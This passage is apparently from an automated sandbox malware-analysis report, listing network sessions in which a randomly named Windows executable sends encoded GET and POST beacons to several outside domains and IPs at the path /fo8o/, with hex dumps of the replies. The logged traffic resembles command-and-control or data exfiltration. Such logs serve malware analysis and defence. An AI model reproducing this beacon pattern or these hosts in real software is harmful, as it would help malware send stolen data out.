61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.54999166.29.149.46804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:07.907162905 CET521OUTGET /fo8o/?k0=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.techchains.info
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:03:09.133428097 CET652INHTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:08 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 493
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.549992195.110.124.133804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:15.262001991 CET798OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 53 30 5a 7a 49 56 54 58 76 4b 5a 37 6d 56 63 63 63 59 53 44 52 4c 2b 39 4a 4d 44 5a 2f 48 79 67 4b 62 4b 62 65 45 3d
                                                                                  Data Ascii: k0=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                  Dec 7, 2024 07:03:16.540817976 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:16 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.549993195.110.124.133804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:18.067347050 CET818OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77
                                                                                  Data Ascii: k0=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                  Dec 7, 2024 07:03:19.260643005 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:19 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.549994195.110.124.133804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:20.789870024 CET1835OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 76 [TRUNCATED]
                                                                                  Data Ascii: k0=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWNQmJCf/r60ReIqr9YvWKa445ojDvIL9ToKhz+H+23Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EO2SzXxHURpveCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adMKOJWb586q0++bqb0hnKbeHTSSOaeXEfwuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9J+v++n+MLZPtINn7STocl2A3Ct0TVuxuY+wgnsJMFRG6tA1RxuVLLvV1AnZhNx1HNnssc7WE/yLrcWMbUzBHXPc1kNCaBFFnx1U97uOS5kDZbbXMP2pDR6ux3gwd0AagBpgRl442rnmHx75cXU3eHxJswxungZDTNQUv505kKZxzw80dtlHOLk/pB/gRWWcZyZbk4ZdNQgs0BmrEzW8TVxt2k82jaSmoGnYjN9XoLQoV1V3MLEI+nuki6gSo2cPk1fxAh9p0o2ralwtZD0t//uTMCXDbrg8fVhD0Ly282XddZXUlAbrcOnA4Vo3SKxFUIZP/22/L8OhkvlybwgHCNEEkxzqhuyeOjkETJOhlPkmzcj/nIXmJCv/eM4YwZqaqLiZRh9WHtxfMi1fKrPdWm4edZPAx0FNzhKyMjvpHto3OeOWNpYDhPl3lVs0qQ1YNP/3AFuKWVkfqkP8N6s1Tl+CTchdpVnnfFygV02iAEx8s/ZD01jKVKesA0Wv8lObFdlA1utCJQSEcpsq [TRUNCATED]
                                                                                  Dec 7, 2024 07:03:22.163995028 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:21 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.549995195.110.124.133804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:23.461193085 CET527OUTGET /fo8o/?k0=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==&hh=cJ5D4t7Hz6GD3fB HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Dec 7, 2024 07:03:24.769037962 CET367INHTTP/1.1 404 Not Found
                                                                                  Date: Sat, 07 Dec 2024 06:03:24 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.549996217.196.55.202804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:47.178399086 CET786OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d
                                                                                  Data Ascii: k0=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
                                                                                  Dec 7, 2024 07:03:48.373049021 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Sat, 07 Dec 2024 06:03:48 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.549997217.196.55.202804568C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 7, 2024 07:03:49.835768938 CET806OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 6b 30 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65
                                                                                  Data Ascii: k0=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
                                                                                  Dec 7, 2024 07:03:51.029675961 CET1085INHTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Sat, 07 Dec 2024 06:03:50 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
